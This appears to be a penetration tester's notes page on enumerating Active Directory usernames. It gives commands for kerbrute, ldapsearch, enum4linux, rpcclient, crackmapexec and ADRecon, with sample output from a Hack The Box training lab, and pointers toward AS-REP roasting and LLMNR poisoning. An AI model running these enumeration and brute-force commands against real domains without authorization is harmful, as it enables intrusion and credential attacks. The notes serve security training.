Users Identification

Guest session

nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute

Wordlist

GitHub - insidetrust/statistically-likely-usernames: Wordlists for creating statistically likely username lists for use in password attacks and security testingGitHub

jsmith.txt and a lot of usefull username list like service-accounts.txt test-accounts or top-formats.txt

Username lists

https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt

From Linkedin

GitHub - initstring/linkedin2username: OSINT Tool: Generate username lists for companies on LinkedInGitHub

LDAP

Nom Nom

Quietly and anonymously bruteforce Active Directory usernames at insane speeds from Domain Controllers by (ab)using LDAP Ping requests (cLDAP)

GitHub - lkarlslund/ldapnomnom: Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)GitHub

Anon

$ ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

guest
ACADEMY-EA-DC01$
ACAD

$ ./windapsearch.py --dc-ip 172.16.5.5 -u "" -U

[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 172.16.5.5
[+] Getting defaultNamingContext from Root DSE
[+]	Found: DC=INLANEFREIGHT,DC=LOCAL
[+] Attempting bind
[+]	...success! Binded as: 
[+]	 None

[+] Enumerating all AD users
[+]	Found 2906 users: 

cn: Guest

cn: Htb Student
userPrincipalName: htb-student@inlanefreight.local

Find user list, then try ASREPROAST, no credentials needed - getNPUsers.py

Kerbrute

Precompiled release:

GitHub - ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcingGitHub

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users

$ vim valid_ad_users.txt
$ awk '{print $NF}' valid_ad_users.txt >> ad_users.txt

kerbrute doesn't always find asreproastable accounts. Always try getNPusers.py to find asreproastable accounts (doesn't require credentials, just a list of users).

Misconfiguration

LLMNR NBT-NS Poisoning

LLMNR NBT-NS Poisoning

Null Session

$ enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

administrator
guest
krbtgt
lab_adm
htb-student
<SNIP>

$ rpcclient -U "" -N 172.16.5.5

rpcclient $> enumdomusers 

crackmapexec smb 172.16.5.5 --users

Find user list, then try ASREPROAST, no credentials needed - getNPUsers.py

Authent

sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users

$ sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users > users.txt
$ cat users.txt | awk '{ print $5 }' | cut -d '\' -f2 > final_users.txt

Windows

PS C:\htb> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt

ADrecon

.\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser

PS C:\htb> .\ADRecon.ps1

[*] ADRecon v1.1 by Prashant Mahajan (@prashant3535)
[*] Running on INLANEFREIGHT.LOCAL\MS01 - Member Server
[*] Commencing - 03/28/2022 09:24:58
[-] Domain
[-] Forest
[-] Trusts
[-] Sites
[-] Subnets
[-] SchemaHistory - May take some time
[-] Default Password Policy
[-] Fine Grained Password Policy - May need a Privileged Account
[-] Domain Controllers
[-] Users and SPNs - May take some time
[-] PasswordAttributes - Experimental
[-] Groups and Membership Changes - May take some time
[-] Group Memberships - May take some time
[-] OrganizationalUnits (OUs)
[-] GPOs
[-] gPLinks - Scope of Management (SOM)
[-] DNS Zones and Records
[-] Printers
[-] Computers and SPNs - May take some time
[-] LAPS - Needs Privileged Account
[-] BitLocker Recovery Keys - Needs Privileged Account
[-] GPOReport - May take some time
[*] Total Execution Time (mins): 11.05
[*] Output Directory: C:\Tools\ADRecon-Report-20220328092458